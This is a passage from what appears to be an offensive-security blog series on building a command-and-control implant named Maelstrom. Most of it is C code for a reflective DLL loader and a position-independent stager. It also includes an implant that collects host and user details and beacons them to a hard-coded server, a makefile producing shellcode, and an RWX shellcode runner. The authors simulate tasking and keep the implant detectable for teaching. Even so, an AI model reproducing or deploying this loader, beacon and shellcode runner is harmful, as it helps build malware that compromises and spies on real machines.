     WORD e_cparhdr;
     WORD e_minalloc;
     WORD e_maxalloc;
     WORD e_ss;
     WORD e_sp;
     WORD e_csum;
     WORD e_ip;
     WORD e_cs;
     WORD e_lfarlc;
     WORD e_ovno;
     WORD e_res[4];
     WORD e_oemid;
     WORD e_oeminfo;
     WORD e_res2[10];
     LONG e_lfanew;
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

if (((PIMAGE_NT_HEADERS)uExportDirectory)->OptionalHeader.Magic == 0x010B) // PE32
{
    if (dwCompiledArch != 1)
        return 0;
}
else if (((PIMAGE_NT_HEADERS)uExportDirectory)->OptionalHeader.Magic == 0x020B) // PE64
{
    if (dwCompiledArch != 2)
        return 0;
}
else
{
    return 0;
}

The struct:

typedef struct _IMAGE_NT_HEADERS64 {
  DWORD                   Signature;
  IMAGE_FILE_HEADER       FileHeader;
  IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

Extract the export directory, the virtual addresses, and so on:

uEntryExport = (UINT_PTR) & ((PIMAGE_NT_HEADERS)uExportDirectory)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
uExportDirectory = uBase + Rva2Offset(((PIMAGE_DATA_DIRECTORY)uEntryExport)->VirtualAddress, uBase);
uEntryExport = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfNames, uBase);
uAddress = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfFunctions, uBase);
uOrdinals = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfNameOrdinals, uBase);
dwNumberOfNames = ((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->NumberOfNames;

And then loop over all the exported function names, converting each name's RVA to a file offset:

char* exportedFunction = (char*)(uBase + Rva2Offset(DEREF_32(uEntryExport), uBase));

Where Rva2Offset() is:

DWORD Rva2Offset(DWORD dwRva, UINT_PTR uiBaseAddress)
{
    WORD wIndex = 0;
    PIMAGE_SECTION_HEADER pSectionHeader = NULL;
    PIMAGE_NT_HEADERS pNtHeaders = NULL;

    pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);

    pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);

    if (dwRva < pSectionHeader[0].PointerToRawData)
        return dwRva;

    for (wIndex = 0; wIndex < pNtHeaders->FileHeader.NumberOfSections; wIndex++)
    {
        if (dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData))
            return (dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData);
    }

    return 0;
}
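To make the arithmetic concrete, here is a small worked sketch of the same RVA-to-offset mapping over a hand-written section table. The Section struct is a cut-down, hypothetical stand-in for IMAGE_SECTION_HEADER and the values are made up for the example.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, reduced stand-in for IMAGE_SECTION_HEADER. */
typedef struct {
    uint32_t VirtualAddress;    /* RVA of the section once mapped */
    uint32_t SizeOfRawData;     /* size of the section on disk */
    uint32_t PointerToRawData;  /* file offset of the section on disk */
} Section;

/* Same logic as Rva2Offset() above, but on a plain array of sections. */
uint32_t rva_to_offset(uint32_t rva, const Section *sections, size_t count)
{
    size_t i;

    if (count == 0)
        return 0;

    /* RVAs inside the headers map one-to-one onto file offsets. */
    if (rva < sections[0].PointerToRawData)
        return rva;

    for (i = 0; i < count; i++) {
        uint32_t start = sections[i].VirtualAddress;
        if (rva >= start && rva - start < sections[i].SizeOfRawData)
            return rva - start + sections[i].PointerToRawData;
    }
    return 0; /* RVA is not backed by any data on disk */
}
```

With a first section at RVA 0x1000 stored at file offset 0x400, and a second at RVA 0x2000 stored at file offset 0xA00, the RVA 0x2010 falls 0x10 bytes into the second section, so it maps to file offset 0xA00 + 0x10 = 0xA10.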

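Each name is compared against cReflectiveLoader. On a match, the name's ordinal is used as an index into the function table and the file offset of the export is returned:

if (STRSTR(exportedFunction, cReflectiveLoader) != NULL)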
{
    uAddress = uBase + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uExportDirectory)->AddressOfFunctions, uBase);
    uAddress += (DEREF_16(uOrdinals) * sizeof(DWORD));
    return Rva2Offset(DEREF_32(uAddress), uBase);
}

At this point, there should be some clear OpSec issues. If they're not obvious, we will point them out in the next few sections!

Once this is done and the offset of the exported function has been found, we can simply start a thread on it:

pRoutine = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);

hThread = ((CREATETHREAD)api.CreateThread_t)(NULL, 0, pRoutine, NULL, 0, NULL);
if (hThread == NULL)
{
    return 1;
}
((WAITFORSINGLEOBJECT)api.WaitForSingleObject_t)(hThread, INFINITE);

Aside from the glaring IOC here, there is one missing WinAPI call which would operate as a cleanup... More on that in the OpSec review posts.

Maelstrom's Entry-point

This is currently how the stager looks:

int run() {

    API Api = {
        0
    };

    DLL Dll = {
        0
    };

    if (ResolveAPIs(&Api) == FALSE) {
        return -1;
    }

#ifdef SAFE
    if (SafetyChecks(Api) == FALSE) {
        return -1;
    }
#endif

    if (GetReflectiveDLL(Api, &Dll) == FALSE) {
        return -1;
    }

    LoadReflectiveDll(Api, Dll);

    return 0;
}

We deem this the safe version, as it has all the checks we discussed. As SAFE is a preprocessor definition, we can control whether or not it's used by passing the -DSAFE flag to MinGW.

The makefile:

CC         =   x86_64-w64-mingw32-gcc
LINKER      =   x86_64-w64-mingw32-ld
OBJCOPY     =   x86_64-w64-mingw32-objcopy
FLAGS       =   -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c
LINKERFLAGS =   -Wl,-Tscripts/linker.ld,--no-seh
SAFE        =   bin/maelstrom.safe.x64
UNSAFE      =   bin/maelstrom.unsafe.x64
SOURCE      =   $(wildcard src/*.c)

safe:
    nasm -f win64 asm/adjuststack.asm -o bin/adjuststack.o

    $(CC) $(SOURCE) $(FLAGS) -DSAFE $(LINKERFLAGS) -o $(SAFE).o

    $(LINKER) -s bin/adjuststack.o $(SAFE).o -o $(SAFE).exe

    $(OBJCOPY) -O binary --only-section=.text $(SAFE).exe $(SAFE).bin

    rm bin/*.o

unsafe:
    nasm -f win64 asm/adjuststack.asm -o bin/adjuststack.o

    $(CC) $(SOURCE) $(FLAGS) $(LINKERFLAGS) -o $(UNSAFE).o

    $(LINKER) -s bin/adjuststack.o $(UNSAFE).o -o $(UNSAFE).exe

    $(OBJCOPY) -O binary --only-section=.text $(UNSAFE).exe $(UNSAFE).bin

    rm bin/*.o

Eagle-eyed readers will notice that this is fully position-independent, which we show at the end of the post.

Stage 1

Custom Reflective Loader

For our demonstration, we will use the original proof-of-concept as this uses common IOCs which we want to keep in the project to ensure that Maelstrom is easily detectable.

DllMain

Once the DLL has been loaded by Stage 0, DllMain is called:

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    HANDLE hThread = NULL;
    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:

#ifndef _DEBUG
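        // dwStackSize is a SIZE_T, so pass 0 (default size) rather than NULL
        hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Maelstrom, NULL, 0, NULL);
        if (hThread != NULL)
            CloseHandle(hThread);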
#endif

    case DLL_PROCESS_DETACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}

When the DLL load reason is DLL_PROCESS_ATTACH, a new thread is created on Maelstrom() which looks like this:

DWORD WINAPI Maelstrom()
{
    // Gather initial info
    PCHAR machineInfo = GetMachineInfo();

    // Check-in
    if (Initialise(machineInfo) == FALSE)
    {
        return -1;
    }

    // do some commands
    Start();

    return 0;
}

DLL Debugging

To debug this in Visual Studio, we check for the _DEBUG preprocessor definition. If it's not present, DllMain creates the thread as normal. Otherwise, we export this function instead:

#ifdef _DEBUG
DLLEXPORT void DebugExport()
{
    Maelstrom();
}
#endif

And a separate loader was written to debug it:

#include <Windows.h>

typedef void (*DebugExport)();

int main(int argc, char* argv[])
{
    HMODULE hModule = LoadLibraryA("maelstrom.1.dll");
    DebugExport f = reinterpret_cast<DebugExport>(GetProcAddress(hModule, "DebugExport"));
    f();
    return 0;
}

We found this to be a cleaner debugging experience than messing with x64dbg.

Checking In

As soon as the implant is launched, the first thing to occur is some basic enumeration which will identify the host:

char* GetMachineInfo()
{
    CHAR lpProcessName[MAX_PATH];
    CHAR lpComputerName[MAX_PATH];
    CHAR lpUserName[MAX_PATH];
    DWORD nSize = MAX_PATH;

    if (!GetComputerNameA(lpComputerName, &nSize))
    {
        return NULL;
    }

    // GetComputerNameA overwrote nSize with the name length, so reset it
    nSize = MAX_PATH;
    if (!GetUserNameA(lpUserName, &nSize))
    {
        return NULL;
    }

    if (!GetModuleFileNameA(NULL, lpProcessName, MAX_PATH))
    {
        return NULL;
    }

    DWORD dwPid = GetCurrentProcessId();

    char* data = malloc(MAX_PATH * 5);

    if (!data)
    {
        return NULL;
    }

    sprintf(data,
        "{ \"init\": {\"processname\": \"%s\", \"computername\": \"%s\", \"username\": \"%s\", \"dwpid\": \"%lu\"}}",
        lpProcessName, lpComputerName, lpUserName, dwPid);

    Xor(data, strlen(data), 0xff);

    return data;

}

In the code above, the process name, computer name, and username are packed into a JSON string, along with the process ID. This is just XOR'd with a hardcoded single-byte key as a proof-of-concept. In a production C2, this should be encrypted with something like AES256-CBC or an equivalent encryption algorithm. As this is an example project, we skip this step.
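To show why a single-byte XOR only counts as a placeholder, here is a minimal sketch of the operation. The source does not show the body of Xor(), so xor_buffer and its signature are assumptions made for illustration.

```c
#include <stddef.h>

/* Hypothetical stand-in for Xor(): XORs every byte with one key byte. */
void xor_buffer(unsigned char *data, size_t len, unsigned char key)
{
    size_t i;

    for (i = 0; i < len; i++)
        data[i] ^= key;
}
```

Applying the function twice with the same key restores the original bytes, so anyone who captures the traffic can recover the JSON by trying at most 256 keys. Note also that any plaintext byte equal to the key becomes 0 after encoding, so the length should be recorded before encoding rather than recomputed with strlen() afterwards.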

The resulting string is then passed to Initialise(), as we saw in Maelstrom():

// Gather initial info
char* machineInfo = GetMachineInfo();

// Check-in
if (Initialise(machineInfo) == FALSE)
{
    return -1;
}

Initialise() is just a wrapper around the SendRequestA() function:

BOOL Initialise(char* machineInfo)
{
    if (SendRequestA(machineInfo))
    {
        return TRUE;
    }
    else
    {
        return FALSE;
    }
}

The SendRequestA() function uses WinHTTP, and relies on a number of WinAPI calls. So, let's get into the configuration of the requests.

Similarly to stage 0, the config is hard-coded:

LPCWSTR wVerb = L"GET";
LPCWSTR wEndpoint = L"/a";
LPCWSTR wUserAgent = L"Maelstrom";
LPCWSTR wVersion = L"HTTP/1.1";
LPCWSTR wServer = L"10.10.11.205";
LPCWSTR wReferer = L"https://google.com";
LPCWSTR wHeaders = L"X-Maelstrom: password";

And some additional config:

int port = 5555;
BOOL bSsl = FALSE;
BOOL bProxy = FALSE;

Again, to repeat ourselves, do not leave these hard-coded.

Once it has initialised, we hit Start():

void Start()
{
    printf("Starting...\n");
    BOOL bRun = TRUE;
    DWORD dwOp = 0;

    while (bRun)
    {
        // Pick a simulated task (0-3) on every iteration
        dwOp = rand() % 4;
        switch (dwOp)
        {
        case 0:
            printf("Simulating Task: 0\n");
            Sleep(5000);
            break;
        case 1:
            printf("Simulating Task: 1\n");
            Sleep(5000);
            break;
        case 2:
            printf("Simulating Task: 2\n");
            Sleep(5000);
            break;
        case 3:
            printf("Simulating Task: 3\n");
            Sleep(5000);
            break;
        }
        printf("Sleeping...\n");
        Sleep(10000);
    }
}

This is our simulation of tasking. Essentially it is operating as the component of the implant which will check, run, and return tasks. We are not providing that functionality though.

Safe Sleeping

One important consideration is how the implant looks in memory between operations. If the implant is idling with nothing to do, it should sleep in such a way that memory scanners or engineers cannot easily identify it as malicious. This is something we will look at more in the runtime analysis, but let's take a quick look. If Process Hacker is used to find the RWX region, this is how the region looks:

In the above, we can see the MZ header, the DOS message, and various section names. These need to be removed, but we will not be providing a solution as we want to stay aligned with the objectives we set out in section one. We will, however, offer some example projects for the enthusiastic reader:

ImageBase   = GetModuleHandleA( NULL );

If malware loads the implant entirely through memory, for example as a Reflective DLL, this technique will not work, because GetModuleHandleA(NULL) returns the base address of the image the DLL is loaded into rather than the base of the DLL itself. For example, if the DLL is reflectively loaded into calc.exe, GetModuleHandleA(NULL) returns the base of calc.exe.

Producing Shellcode for Loaders and Droppers

As stage 0 is already position-independent and the build produces both an exe and a bin for each stage 0 variant, we can easily convert the bin into a C array with:

xxd -i maelstrom.x64.unsafe.bin > shellcode.h

Produces:

unsigned char shellcode_bin[] = {
  /* Too Long */
};
unsigned int shellcode_bin_len = 5248;

This can then be loaded with:

#include <stdio.h>
#include <windows.h>
#include "buf.h"

int main()
{
    LPVOID pAddress = VirtualAlloc(nullptr, buf_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(pAddress, buf, buf_len);
    HANDLE hThread = CreateThread(nullptr, NULL, (LPTHREAD_START_ROUTINE)pAddress, nullptr, 0, nullptr);
    Sleep(10000);
    return 0;
}

Instead of calling WaitForSingleObject on the thread, we use a Sleep in the above because the shellcode will create a new thread and exit when the RDLL is loaded, causing the thread we are waiting on to exit successfully. So, for demonstration purposes, we just sleep.

Bear in mind that with SAFE defined, the shellcode size goes up to 8192 bytes.

Now that we have loadable shellcode, it can be wrapped in any shellcode loader:

.NET
Go
Rust
Nim

You name it, it should work!

Conclusion

At long last, we finally have some code that runs, and a plan for more functionality and security. There are manifold ways to progress the implant from here, from improving the implant's operational security to fleshing out its communication channels.

This blog post has been pretty heavily in favour of the offense, and light on operational security. As we've discussed, defensive techniques such as hooking AMSI and ETW TI present a potent limitation on the operational security of the implant. Our next two posts will look at these protections, how they work, and how an implant can attempt to bypass them.
